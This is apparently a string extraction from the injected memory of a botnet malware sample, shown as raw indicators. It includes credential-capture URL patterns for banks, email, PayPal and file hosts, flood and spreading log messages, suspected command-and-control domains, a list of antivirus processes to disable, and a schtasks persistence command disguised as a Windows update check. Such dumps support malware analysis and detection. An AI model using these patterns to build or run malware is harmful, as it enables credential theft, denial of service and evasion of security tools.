bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\imapi.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\imapi.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>spoolsv.exe_1440_rwx_00F50000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\spoolsv.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\spoolsv.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre>Explorer.EXE_1912_rwx_021E0000_00027000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>PSSVSSh</pre><pre>RPVSSh</pre><pre>PSSh(</pre><pre>PSSh#</pre><pre>PSSh'</pre><pre>PSSh&</pre><pre>PSSh*</pre><pre>9p.uV</pre>Explorer.EXE_1912_rwx_02208000_00072000:<pre>Opera/9.00 (Windows NT 5.1; U; en)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)</pre><pre>Opera 9.4 (Windows NT 6.1; U; en)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)</pre><pre>Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)</pre><pre>SbieDll.dll</pre><pre>Software\Classes\CLSID\%s\X</pre><pre>Software\Classes\CLSID\%s\X\%s</pre><pre>0xX</pre><pre>SB:0xX</pre><pre>G:%s_0xX_%c:%s_v1$</pre><pre>Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u</pre><pre>IEXPLORE.EXE</pre><pre>IE.HTTP</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice</pre><pre>IE.HTTPS</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice</pre><pre>IE.AssocFile.HTM</pre><pre>HTTP\shell\open\command</pre><pre>Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s</pre><pre>Psapi.dll</pre><pre>%s\%s</pre><pre>Software\Adobe\Acrobat Reader\%s\Privileged</pre><pre>mscoree.dll</pre><pre>HARDWARE\DESCRIPTION\System\CentralProcessor\%u</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion</pre><pre>nspr4.dll</pre><pre>nss3.dll</pre><pre>Urlmon.dll</pre><pre>URLDownloadToFileW</pre><pre>Netapi32.dll</pre><pre>76487-640-1457236-23837</pre><pre>76487-337-8429955-22614</pre><pre>76487-644-3177037-23510</pre><pre>76497-640-6308873-23835</pre><pre>55274-640-2673064-23950</pre><pre>76487-640-8834005-23195</pre><pre>76487-640-0716662-23535</pre><pre>76487-644-8648466-23106</pre><pre>00426-293-8170032-85146</pre><pre>76487-341-5883812-22420</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup</pre><pre>{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}</pre><pre>snxhk.dll</pre><pre>comctl32.dll</pre><pre>ZwSetValueKey</pre><pre>ZwDeleteValueKey</pre><pre>SOFTWARE\%s</pre><pre>update.microsoft.com</pre><pre>microsoft.com</pre><pre>windowsupdate.microsoft.com</pre><pre>JOIN</pre><pre>PRIVMSG</pre><pre>.rdata</pre><pre>cmd_option.%s</pre><pre>/c %s</pre><pre>cmd.exe</pre><pre>msvcrt.dll</pre><pre>--x-x-x-xx</pre><pre>Content-Type: multipart/form-data; boundary=x-x-x-xx</pre><pre>Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"</pre><pre>%s?action=up&g=%s</pre><pre>xul.dll</pre><pre><Port></Port></pre><pre><Pass></Pass></pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>HTTP/1.1</pre><pre>?pid=%d</pre><pre>?page=%d</pre><pre>?id=%u</pre><pre>%s=%u&%s=%s</pre><pre>%s=%s&%s=%u</pre><pre>&%s=%s</pre><pre>&%s%u=</pre><pre>&%s%hu=</pre><pre>&%s=_%u</pre><pre>%d|%s|%s|%s</pre><pre>.info</pre><pre>httpget</pre><pre>GET /%s HTTP/1.1</pre><pre>Host: %s</pre><pre>Content-Length: %d</pre><pre>Accept: %s</pre><pre>Accept-Language: %s</pre><pre>Accept-Charset: %s</pre><pre>Accept-Encoding: %s</pre><pre>User-Agent: %s</pre><pre>Referer: %s</pre><pre>Connection: %s</pre><pre>http://</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>tbb-firefox.exe</pre><pre>%s:%hu</pre><pre>windowsupdate</pre><pre>SSH2_MSG_KEXINIT</pre><pre>SSH2_MSG_DISCONNECT</pre><pre>SSH2_MSG_USERAUTH_SUCCESS</pre><pre>http://%s%s/image.php?id=%s</pre><pre>TaskDialogIndirect</pre><pre>http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535</pre><pre>ÐxX</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>secur32.dll</pre><pre>crypt32.dll</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>wininet.dll</pre><pre>shell32.dll</pre><pre>shlwapi.dll</pre><pre>ole32.dll</pre><pre>version.dll</pre><pre>sfc.dll</pre><pre>dnsapi.dll</pre><pre>ws2_32.dll</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></pre><pre>8"808]9|9</pre><pre>9%9 919<9</pre><pre>=(=/=6==={=</pre><pre>4 4?4^4}4</pre><pre>6o6g6r6w6</pre><pre>9 9$9(90949</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>This pointer, %d, is aligned on %d</pre><pre>This pointer, %d, is not aligned on %d</pre><pre>%f, %f and %f form a right-angled triangle.</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>?#%X.y</pre><pre>%S#[k</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>GetCPInfo</pre><pre>GetWindowsDirectoryA</pre><pre>CreatePipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>.VI3xqr</pre><pre>zcÁ</pre><pre>Udp?iw0</pre><pre>/#"%f</pre><pre>P.oUw</pre><pre>B%Su[</pre><pre>Rkka.by</pre><pre>.dYi'</pre><pre>p.Cvq</pre><pre>.EU{%</pre><pre>D<w><pre>;0.Bx</pre><pre>%s)$O</pre><pre>i.zC:*</pre><pre>@7WeB</pre><pre>ld0%F</pre><pre>r. -.kN</pre><pre>.kal"</pre><pre>f.xKK</pre><pre>Software\Classes\CLSID\%S</pre><pre>G:%S_0xX</pre><pre>chrome.exe</pre><pre>opera.exe</pre><pre>safari.exe</pre><pre>maxthon.exe</pre><pre>:Mozilla\Firefox\Profiles</pre><pre>cookies.sqlite</pre><pre>%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*</pre><pre>%s\winsxs\%s\comctl32.dll</pre><pre>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s</pre><pre>%s:*:Enabled</pre><pre>avcuf32.dll</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>prstrui.exe</pre><pre>Windows Defender</pre><pre>MpClient.dll</pre><pre>Windows Defender\MSASCui.exe</pre><pre>MpSvc.dll</pre><pre>msseces.exe</pre><pre>MsMpEng.exe</pre><pre>MSASCui.exe</pre><pre>MpAsDesc.dll</pre><pre>MsMpLics.dll</pre><pre>avgui.exe</pre><pre>avgidsagent.exe</pre><pre>avgwdsvc.exe</pre><pre>avgdiagex.exe</pre><pre>avgmfapx.exe</pre><pre>avgupd.exe</pre><pre>avgcfgex.exe</pre><pre>avgnt.exe</pre><pre>avguard.exe</pre><pre>avshadow.exe</pre><pre>avcenter.exe</pre><pre>update.dll</pre><pre>updaterc.dll</pre><pre>usrreq.exe</pre><pre>ccsvchst.exe</pre><pre>symerr.exe</pre><pre>NIS.exe</pre><pre>NAV.exe</pre><pre>navw32.exe</pre><pre>avastui.exe</pre><pre>AvastEmUpdate.exe</pre><pre>ashUpd.exe</pre><pre>WRSA.exe</pre><pre>zatray.exe</pre><pre>ForceField.exe</pre><pre>updating.dll</pre><pre>fshoster32.exe</pre><pre>fsaua.dll</pre><pre>PSUNMain.exe</pre><pre>PSUAService.exe</pre><pre>PSANHost.exe</pre><pre>PSUNScan.dll</pre><pre>epavjobs.exe</pre><pre>AVENGINE.exe</pre><pre>Upgrader.exe</pre><pre>adaware.exe</pre><pre>BullGuard.exe.manifest</pre><pre>BullGuardUpdate.exe</pre><pre>BullGuard.exe</pre><pre>BullGuardScanner.exe</pre><pre>BullGuardBhvScanner.exe</pre><pre>BullGuardUpdate2.exe</pre><pre>BgScan.exe</pre><pre>BgScanEngine.dll</pre><pre>.manifest</pre><pre>updater.exe</pre><pre>Backup\RSD\RSSetup\updater.exe</pre><pre>RsTray.exe</pre><pre>RavMonD.exe</pre><pre>RsMgrSvc.exe</pre><pre>rsmain.exe</pre><pre>RsScan.dll</pre><pre>RsTray.dll</pre><pre>mbamgui.exe</pre><pre>mbam.exe</pre><pre>pctsGui.exe</pre><pre>pctsAuxs.exe</pre><pre>pctsSvc.exe</pre><pre>Update.exe</pre><pre>UpdateHlpr.dll</pre><pre>Definitions\vcore.dll</pre><pre>sbamui.exe</pre><pre>SBAMTray.exe</pre><pre>updater_client_mod.dll</pre><pre>FProtTray.exe</pre><pre>FPWin.exe</pre><pre>scf.dat</pre><pre>ALUpdate.exe</pre><pre>update_tmp.exe</pre><pre>arcaclean.exe</pre><pre>BavUpdater.exe</pre><pre>rcfp.exe</pre><pre>CLPSLA.exe</pre><pre>op_mon.exe</pre><pre>niu.exe</pre><pre>K7TSUpdT.exe</pre><pre>sguardxup.exe</pre><pre>ccupdate.exe</pre><pre>caupdate.dll</pre><pre>a2guard.exe</pre><pre>a2start.exe</pre><pre>a2service.exe</pre><pre>AVKTray.exe</pre><pre>GDSC.exe</pre><pre>AVK.exe</pre><pre>GDFirewallTray.exe</pre><pre>Bka.exe</pre><pre>BLuPro.exe</pre><pre>BkavSystemServer.exe</pre><pre>BkavService.exe</pre><pre>LiveUpdate.dll</pre><pre>LiveConnect.dll</pre><pre>BaseFile\Bkav\LiveUpdate.dll</pre><pre>V3Lite.exe</pre><pre>ASDSvc.exe</pre><pre>autoup.exe</pre><pre>downloader.exe</pre><pre>%s.config</pre><pre>updatesrv.exe</pre><pre>updatemgr.dll</pre><pre>egui.exe</pre><pre>ekrn.exe</pre><pre>x86\ekrn.exe</pre><pre>uWinMgr.exe</pre><pre>coreServiceShell.exe</pre><pre>uiSeAgnt.exe</pre><pre>uiWatchDog.exe</pre><pre>plugins\plugUpdater.dll</pre><pre>UiFrmwrk\uiUpdateTray.exe</pre><pre>coreFrameworkHost.exe</pre><pre>mcagent.exe</pre><pre>McSvHost.exe</pre><pre>McUICnt.exe</pre><pre>McPvTray.exe</pre><pre>mcui_exe</pre><pre>mcpltui_exe</pre><pre>mcshell.exe</pre><pre>mcupdmgr.exe</pre><pre>mcupdate.exe</pre><pre>mcshield.exe</pre><pre>mcupdui.dll</pre><pre>McAPExe.exe</pre><pre>.config</pre><pre>Image File Execution Options\%s</pre><pre>SYSTEM\CurrentControlSet\services\%s</pre><pre>%c:\ntusbdriver.sys</pre><pre>%c:\*p.exe</pre><pre>%c:\%s</pre><pre>p.exe</pre><pre>%WinDir%\explorer.exe</pre><pre>/C start /d. %s&"%s"</pre><pre>%COMSPEC%</pre><pre>%WinDir%\system32\shell32.dll</pre><pre>%c:\%s.lnk</pre><pre>VisthAux.exe</pre><pre>explorer.exe</pre><pre>t.minecraft</pre><pre>Works! PID: %d, Name: %s</pre><pre>cmdvirth</pre><pre>%s%s\X</pre><pre>tcp://</pre><pre>svchost.exe</pre><pre>csrss.exe</pre><pre>lsass.exe</pre><pre>smss.exe</pre><pre>wscript.exe</pre><pre>cscript.exe</pre><pre>vbc.exe</pre><pre>rundll32.exe</pre><pre>regsvr32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>winlogon.exe</pre><pre>services.exe</pre><pre>%s\x.lnk</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>desktop.ini</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>wintrust.dll</pre><pre>chrome.dll</pre><pre>Applications\iexplore.exe\shell\open\command</pre><pre>%s_xx</pre><pre>x.zip</pre><pre>Navw32.exe</pre><pre>SysInspector.exe</pre><pre>avscan.exe</pre><pre>mfefire.exe</pre><pre>wuauclt.exe</pre><pre>WerFault.exe</pre><pre>lFileZilla\sitemanager.xml</pre><pre>port</pre><pre>Sites.dat</pre><pre>Quick.dat</pre><pre>%s\3\%s</pre><pre>%s\4\%s</pre><pre>spoolsv.exe</pre><pre>steam.exe</pre><pre>skype.exe</pre><pre>origin.exe</pre><pre>dwm.exe</pre><pre>tapi3.dll</pre><pre>/C copy "%s" "%s"</pre><pre>SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Update Service</pre><pre>"%s" /%s</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST</pre><pre>schtasks.exe</pre><pre>/DELETE /TN "Windows Update Check - 0xX" /F</pre><pre>\Windows\Explorer.exe</pre><pre>Low_X</pre><pre>%s.manifest</pre><pre>PendingFileRenameOperations</pre><pre>%s\X</pre><pre>Windows\CurrentVersion\Run</pre><pre>CurrentVersion\Windows</pre><pre>Windows NT\CurrentVersion\Image File Execution 